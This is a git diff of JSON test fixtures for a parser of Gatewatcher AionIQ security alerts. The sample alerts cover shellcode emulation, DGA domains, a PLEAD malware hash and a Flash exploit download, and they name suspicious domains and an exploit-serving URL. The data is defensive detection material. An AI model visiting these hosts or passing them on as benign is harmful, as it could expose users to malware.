you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n \"_id\": 1,\n \"ret\": \"1\"\n },\n {\n \"call\": \"kernel32_ExitProcess\",\n \"args\": \"{uExitCode: 0}\",\n \"_id\": 2,\n \"ret\": \"0\"\n },\n {\n \"info\": \"Stop : End of shellcode (Exit)\",\n \"_id\": -1\n }\n ],\n \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n },\n \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n \"@version\": \"1\",\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n 
\"module\": \"shellcode_detect\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"severity\": 1,\n \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n \"created\": \"2024-09-11T15:36:36.068564+0000\"\n }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/dga_event.json b/GateWatcher/aioniq_ecs/tests/dga_event.json
index fab96a746..fee9d3a49 100644
--- a/GateWatcher/aioniq_ecs/tests/dga_event.json
+++ b/GateWatcher/aioniq_ecs/tests/dga_event.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"network\": {\n \"protocol\": \"dns\",\n \"transport\": \"udp\",\n \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n \"flow_id\": 1434780527372168\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"ip\": \"27.0.0.227\"\n },\n \"destination\": {\n \"port\": 53,\n \"ip\": \"202.129.215.23\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"dga\": {\n \"dga_count\": 35,\n \"dga_ratio\": 0.97,\n \"malware_behavior_confidence\": 50,\n \"nx_domain_count\": 36,\n \"top_DGA\": [\n \"zmhaoyukbol6a.com\",\n \"ppyblaohb.com\",\n \"khllpmpmare.com\",\n \"lttulzaiaoctpa7.com\",\n \"jetuergatod.com\",\n \"riaaiysk.com\",\n \"anxsmqyfy.com\",\n \"tqjhvylf.com\",\n \"vdunsygwoktx.com\",\n \"jhghrlufoh.com\"\n ]\n },\n \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n \"kind\": \"alert\",\n \"module\": \"dga_detect\",\n \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"dataset\": \"alert\",\n \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"network\": {\n \"protocol\": \"dns\",\n \"transport\": \"udp\",\n \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n \"flow_id\": 1434780527372168\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n 
\"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"ip\": \"27.0.0.227\"\n },\n \"destination\": {\n \"port\": 53,\n \"ip\": \"202.129.215.23\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"dga\": {\n \"dga_count\": 35,\n \"dga_ratio\": 0.97,\n \"malware_behavior_confidence\": 50,\n \"nx_domain_count\": 36,\n \"top_DGA\": [\n \"zmhaoyukbol6a.com\",\n \"ppyblaohb.com\",\n \"khllpmpmare.com\",\n \"lttulzaiaoctpa7.com\",\n \"jetuergatod.com\",\n \"riaaiysk.com\",\n \"anxsmqyfy.com\",\n \"tqjhvylf.com\",\n \"vdunsygwoktx.com\",\n \"jhghrlufoh.com\"\n ]\n },\n \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n \"kind\": \"alert\",\n \"module\": \"dga_detect\",\n \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"dataset\": \"alert\",\n \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n }\n}" + } }, "expected": { "message": "{\n \"network\": {\n \"protocol\": \"dns\",\n \"transport\": \"udp\",\n \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n \"flow_id\": 1434780527372168\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"ip\": \"27.0.0.227\"\n },\n \"destination\": {\n \"port\": 53,\n \"ip\": \"202.129.215.23\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"dga\": {\n \"dga_count\": 35,\n 
\"dga_ratio\": 0.97,\n \"malware_behavior_confidence\": 50,\n \"nx_domain_count\": 36,\n \"top_DGA\": [\n \"zmhaoyukbol6a.com\",\n \"ppyblaohb.com\",\n \"khllpmpmare.com\",\n \"lttulzaiaoctpa7.com\",\n \"jetuergatod.com\",\n \"riaaiysk.com\",\n \"anxsmqyfy.com\",\n \"tqjhvylf.com\",\n \"vdunsygwoktx.com\",\n \"jhghrlufoh.com\"\n ]\n },\n \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n \"kind\": \"alert\",\n \"module\": \"dga_detect\",\n \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"dataset\": \"alert\",\n \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json
index a043a3805..7f04542c5 100644
--- a/GateWatcher/aioniq_ecs/tests/history.json
+++ b/GateWatcher/aioniq_ecs/tests/history.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"event\",\n \"dataset\": \"administration\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"history\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"history\": {\n \"type\": \"user\",\n \"name\": \"pierre.pocry\",\n \"id\": 18,\n \"ip\": \"192.192.32.12\",\n \"content\": {},\n \"method\": \"POST\",\n \"endpoint\": \"/gum/configuration\",\n \"code\": \"200\"\n },\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"event\",\n \"dataset\": \"administration\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"history\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"history\": {\n \"type\": \"user\",\n \"name\": \"pierre.pocry\",\n \"id\": 18,\n \"ip\": \"192.192.32.12\",\n \"content\": {},\n \"method\": \"POST\",\n \"endpoint\": \"/gum/configuration\",\n \"code\": \"200\"\n },\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"event\",\n \"dataset\": \"administration\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"history\",\n \"id\": 
\"8223b432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"history\": {\n \"type\": \"user\",\n \"name\": \"pierre.pocry\",\n \"id\": 18,\n \"ip\": \"192.192.32.12\",\n \"content\": {},\n \"method\": \"POST\",\n \"endpoint\": \"/gum/configuration\",\n \"code\": \"200\"\n },\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
index ffb6a02cd..d3d83ec37 100644
--- a/GateWatcher/aioniq_ecs/tests/ioc.json
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"product\": \"lastinfosec\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"enrichment\",\n \"dataset\": \"ioc\",\n \"category\": [\n \"network\",\n \"threat\"\n ],\n \"module\": \"ioc\",\n \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"created\": \"2019-10-23T05:33:54+00:00\",\n \"severity\": 2,\n \"severity_human\": \"High suspicious\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ioc\": {\n \"tlp\": \"green\",\n \"type\": \"SHA256\",\n \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n \"relations\": [\n \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n \"b57f419e-8b12-49d3-886b-145383725dcd\"\n ],\n \"ttp\": [],\n \"families\": [\n \"PLEAD\"\n ],\n \"campaigns\": [],\n \"categories\": [\n \"malware\",\n \"trojan\"\n ],\n \"threat_actor\": [\n \"BlackTech\"\n ],\n \"targeted_sectors\": [],\n \"targeted_organizations\": [],\n \"targeted_platforms\": [],\n \"targeted_countries\": [],\n \"vulnerabilities\": [],\n \"kill_chain_phases\": [],\n \"meta_data\": {\n \"cwe\": [],\n \"descriptions\": [],\n \"usageMode\": \"detection\"\n },\n \"usage_mode\": \"detection\",\n \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n \"tags\": [\n \"troj_fr.df33c1bd\",\n \"trojan.plead.win32.33\",\n \"gen:variant.graftor.598952 (b)\",\n \"generic backdoor.gy\",\n \"win32/plead.au trojan\",\n 
\"trojan/plead!exyhr4fe\",\n \"trojan.win32.plead.fqunov\",\n \"tr/plead.mysge\",\n \"trojan.win32.plead\",\n \"trojan ( 0055a46c1 )\",\n \"malware\",\n \"trojan.win32.plead.aa\",\n \"trojan/win32.plead\"\n ],\n \"external_links\": [\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n },\n {\n \"source_name\": \"any.run_report\",\n \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n }\n ]\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"product\": \"lastinfosec\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"enrichment\",\n \"dataset\": \"ioc\",\n \"category\": [\n \"network\",\n \"threat\"\n ],\n \"module\": \"ioc\",\n \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"created\": \"2019-10-23T05:33:54+00:00\",\n \"severity\": 2,\n \"severity_human\": \"High suspicious\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ioc\": {\n \"tlp\": \"green\",\n \"type\": \"SHA256\",\n \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked 
to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n \"relations\": [\n \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n \"b57f419e-8b12-49d3-886b-145383725dcd\"\n ],\n \"ttp\": [],\n \"families\": [\n \"PLEAD\"\n ],\n \"campaigns\": [],\n \"categories\": [\n \"malware\",\n \"trojan\"\n ],\n \"threat_actor\": [\n \"BlackTech\"\n ],\n \"targeted_sectors\": [],\n \"targeted_organizations\": [],\n \"targeted_platforms\": [],\n \"targeted_countries\": [],\n \"vulnerabilities\": [],\n \"kill_chain_phases\": [],\n \"meta_data\": {\n \"cwe\": [],\n \"descriptions\": [],\n \"usageMode\": \"detection\"\n },\n \"usage_mode\": \"detection\",\n \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n \"tags\": [\n \"troj_fr.df33c1bd\",\n \"trojan.plead.win32.33\",\n \"gen:variant.graftor.598952 (b)\",\n \"generic backdoor.gy\",\n \"win32/plead.au trojan\",\n \"trojan/plead!exyhr4fe\",\n \"trojan.win32.plead.fqunov\",\n \"tr/plead.mysge\",\n \"trojan.win32.plead\",\n \"trojan ( 0055a46c1 )\",\n \"malware\",\n \"trojan.win32.plead.aa\",\n \"trojan/win32.plead\"\n ],\n \"external_links\": [\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n },\n {\n \"source_name\": \"any.run_report\",\n \"url\": 
\"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n }\n ]\n }\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"product\": \"lastinfosec\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"enrichment\",\n \"dataset\": \"ioc\",\n \"category\": [\n \"network\",\n \"threat\"\n ],\n \"module\": \"ioc\",\n \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"created\": \"2019-10-23T05:33:54+00:00\",\n \"severity\": 2,\n \"severity_human\": \"High suspicious\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ioc\": {\n \"tlp\": \"green\",\n \"type\": \"SHA256\",\n \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n \"relations\": [\n \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n \"b57f419e-8b12-49d3-886b-145383725dcd\"\n ],\n \"ttp\": [],\n \"families\": [\n \"PLEAD\"\n ],\n \"campaigns\": [],\n \"categories\": [\n \"malware\",\n \"trojan\"\n ],\n \"threat_actor\": [\n \"BlackTech\"\n ],\n \"targeted_sectors\": [],\n \"targeted_organizations\": [],\n \"targeted_platforms\": [],\n \"targeted_countries\": [],\n \"vulnerabilities\": [],\n \"kill_chain_phases\": [],\n \"meta_data\": {\n \"cwe\": [],\n \"descriptions\": [],\n \"usageMode\": \"detection\"\n },\n \"usage_mode\": \"detection\",\n \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n \"tags\": [\n \"troj_fr.df33c1bd\",\n 
\"trojan.plead.win32.33\",\n \"gen:variant.graftor.598952 (b)\",\n \"generic backdoor.gy\",\n \"win32/plead.au trojan\",\n \"trojan/plead!exyhr4fe\",\n \"trojan.win32.plead.fqunov\",\n \"tr/plead.mysge\",\n \"trojan.win32.plead\",\n \"trojan ( 0055a46c1 )\",\n \"malware\",\n \"trojan.win32.plead.aa\",\n \"trojan/win32.plead\"\n ],\n \"external_links\": [\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n },\n {\n \"source_name\": \"any.run_report\",\n \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n }\n ]\n }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json
index 068b58407..d9aec47da 100644
--- a/GateWatcher/aioniq_ecs/tests/malcore_event.json
+++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"202.129.215.251\"\n },\n \"file\": {\n \"magic\": \"Macromedia Flash data (compressed), version 13\",\n \"sid\": [\n 1100020\n ],\n \"hash\": {\n \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n },\n \"name\": \"/\",\n \"file_id\": 219,\n \"tx_id\": 2,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 55351,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n \"malcore\": {\n \"file_type\": \"application/x-shockwave-flash\",\n \"analyzers_up\": 16,\n \"analyzed_clean\": 9,\n \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n \"state\": \"Infected\",\n \"total_found\": \"3/16\",\n \"detail_scan_time\": 373,\n \"reporting_token\": \"\",\n \"analyzed_infected\": 3,\n \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n \"analyzed_suspicious\": 0,\n \"analyzed_error\": 0,\n \"processing_time\": 1576,\n \"engine_id\": {\n \"5\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c18ab9n\"\n },\n \"8\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"Exploit.Flash\",\n \"id\": \"ib54e9s\"\n },\n \"4\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"c10195e\"\n },\n \"14\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"t3114fn\"\n },\n \"13\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"sde882s\"\n },\n \"9\": {\n \"scan_result\": 
\"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"kfb8487\"\n },\n \"12\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"qb9308l\"\n },\n \"10\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"mb2b5fe\"\n },\n \"0\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"a32935b\"\n },\n \"15\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"we9a17t\"\n },\n \"6\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c81e55c\"\n },\n \"7\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"\",\n \"id\": \"e83bf1t\"\n },\n \"3\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"b557a5r\"\n },\n \"1\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"EXP/Flash.EB.502\",\n \"id\": \"acf9bba\"\n },\n \"11\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"Unavailable (permanently_failed)\",\n \"id\": \"n00000e\"\n },\n \"2\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"SWF/Exploit\",\n \"id\": \"af7872b\"\n }\n },\n \"detail_wait_time\": 660,\n \"file_type_description\": \"Macromedia Flash Player\",\n \"code\": 1,\n \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n \"analyzed_other\": 4\n },\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1779492455056060\n },\n \"destination\": {\n \"port\": 47858,\n \"ip\": \"27.0.0.144\"\n },\n \"url\": {\n \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n },\n \"user_agent\": {\n \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": 
\"chunky.enchantingweddingsandevents.co.uk\",\n \"version\": \"HTTP/1.1\",\n \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/x-shockwave-flash\",\n \"bytes\": 55351\n }\n },\n \"event\": {\n \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n \"kind\": \"alert\",\n \"module\": \"malcore\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T09:15:23.329615+0000\",\n \"dataset\": \"alert\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"202.129.215.251\"\n },\n \"file\": {\n \"magic\": \"Macromedia Flash data (compressed), version 13\",\n \"sid\": [\n 1100020\n ],\n \"hash\": {\n \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n },\n \"name\": \"/\",\n \"file_id\": 219,\n \"tx_id\": 2,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 55351,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n \"malcore\": {\n \"file_type\": \"application/x-shockwave-flash\",\n \"analyzers_up\": 16,\n \"analyzed_clean\": 9,\n \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n \"state\": \"Infected\",\n \"total_found\": \"3/16\",\n \"detail_scan_time\": 373,\n \"reporting_token\": \"\",\n \"analyzed_infected\": 3,\n 
\"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n \"analyzed_suspicious\": 0,\n \"analyzed_error\": 0,\n \"processing_time\": 1576,\n \"engine_id\": {\n \"5\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c18ab9n\"\n },\n \"8\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"Exploit.Flash\",\n \"id\": \"ib54e9s\"\n },\n \"4\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"c10195e\"\n },\n \"14\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"t3114fn\"\n },\n \"13\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"sde882s\"\n },\n \"9\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"kfb8487\"\n },\n \"12\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"qb9308l\"\n },\n \"10\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"mb2b5fe\"\n },\n \"0\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"a32935b\"\n },\n \"15\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"we9a17t\"\n },\n \"6\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c81e55c\"\n },\n \"7\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"\",\n \"id\": \"e83bf1t\"\n },\n \"3\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"b557a5r\"\n },\n \"1\": {\n \"scan_result\": \"INFECTED\",\n 